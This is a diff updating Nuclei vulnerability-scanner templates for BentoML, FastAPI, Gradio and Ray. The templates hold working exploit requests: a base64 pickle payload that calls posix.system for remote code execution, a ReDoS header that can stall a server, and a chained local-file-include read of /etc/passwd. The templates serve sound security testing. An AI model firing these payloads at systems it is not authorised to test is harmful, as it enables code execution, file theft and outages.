diff --git a/bentoml/bentoml-rce.yaml b/bentoml/bentoml-rce.yaml index d922209..d1f9d72 100644 --- a/bentoml/bentoml-rce.yaml +++ b/bentoml/bentoml-rce.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-1188 # Insecure Default Initialization of Resource tags: bentoml, rce, deserialization, protectai, huntr, ai, machine-learning -requests: +http: - method: POST path: - "{{BaseURL}}/summarize" @@ -21,6 +21,7 @@ requests: Content-Type: "application/vnd.bentoml+pickle" body: !!binary | gASVJAAAAAAAAACMBXBvc2l4lIwGc3lzdGVtlJOUjAlwcm90ZWN0YWmUhZRSlC4= + matchers-condition: and matchers: - type: word diff --git a/fastapi/fastapi_dos.yaml b/fastapi/fastapi_dos.yaml index 54ae86b..fd74a99 100644 --- a/fastapi/fastapi_dos.yaml +++ b/fastapi/fastapi_dos.yaml @@ -1,7 +1,7 @@ id: fastapi-redos info: name: Check FastAPI ReDoS Vulnerability in Form Data Parsing - author: DanMcInerney, byt3bl33d3r, nicecatch2000 + author: DanMcInerney, byt3bl33d3r, nicecatch2000, daffainfo severity: high description: Checks for ReDoS vulnerability in FastAPI when parsing form data with a malicious Content-Type header. reference: @@ -11,13 +11,18 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H cwe-id: CWE-400 # Resource Exhaustion tags: fastapi, redos, dos, vulnerability, ai, ml, protectai, huntr -requests: - - method: POST - path: - - "{{BaseURL}}/submit/" - headers: - Content-Type: "application/x-www-form-urlencoded; !=\"\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'" - body: "input=1" + +http: + - raw: + - |+ + POST /submit/ HTTP/1.1 + Host: {{Hostname}} + Accept: */* + Content-Type: application/x-www-form-urlencoded; !="\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\ + Content-Length: 7 + + input=1 + unsafe: true matchers-condition: and matchers: - type: status @@ -25,5 +30,7 @@ requests: - 500 - 502 - 504 - - type: time - time: 5000 # Milliseconds, you may adjust this threshold based on expected response times \ No newline at end of file + + - type: dsl + dsl: + - 'duration>=5' \ No newline at end of file diff --git a/gradio/gradio-lfi.yaml b/gradio/gradio-lfi.yaml index 43ae8b6..1976229 100644 --- a/gradio/gradio-lfi.yaml +++ b/gradio/gradio-lfi.yaml @@ -1,7 +1,7 @@ id: gradio-local-file-include info: name: Gradio Local File Read Vulnerability - author: ozelis, DanMcInerney + author: ozelis, DanMcInerney, daffainfo severity: high description: This nuclei template checks for Local File Read vulnerability in Gradio applications. reference: @@ -13,7 +13,9 @@ info: cve-id: CVE-2024-1561 tags: gradio, lfi, local-file-include, python, api, ai, machine-learning, huntr -requests: +flow: http(1) && http(2) && http(3) + +http: - method: GET path: - "{{BaseURL}}/config" @@ -26,20 +28,18 @@ requests: json: - ".components[0].id" - - method: POST - path: - - "{{BaseURL}}/component_server" + - raw: + - | + POST /component_server HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json - headers: - Content-Type: application/json - - body: | - { - "component_id": "{{component_id}}", - "data": "/etc/passwd", - "fn_name": "move_resource_to_block_cache", - "session_hash": "aaaaaaaaaaa" - } + { + "component_id": "{{component_id}}", + "data": "/etc/passwd", + "fn_name": "move_resource_to_block_cache", + "session_hash": "aaaaaaaaaaa" + } extractors: - type: regex @@ -48,16 +48,16 @@ requests: internal: true group: 1 regex: - - "\"(.+)\"" + - '"(.+)"' - method: GET path: - "{{BaseURL}}/file={{extracted_content}}" - - matchers-condition: and + matchers-condition: and matchers: - type: regex + part: body regex: - "root:.*:0:0:" diff --git a/ray/nuclei-templates/ray-static-lfi.yaml b/ray/nuclei-templates/ray-static-lfi.yaml index a8b3e53..21bb431 100644 --- a/ray/nuclei-templates/ray-static-lfi.yaml +++ b/ray/nuclei-templates/ray-static-lfi.yaml @@ -13,7 +13,6 @@ info: cwe-id: CWE-29 tags: ray,ml,cve,huntr,protectai - http: - method: GET path: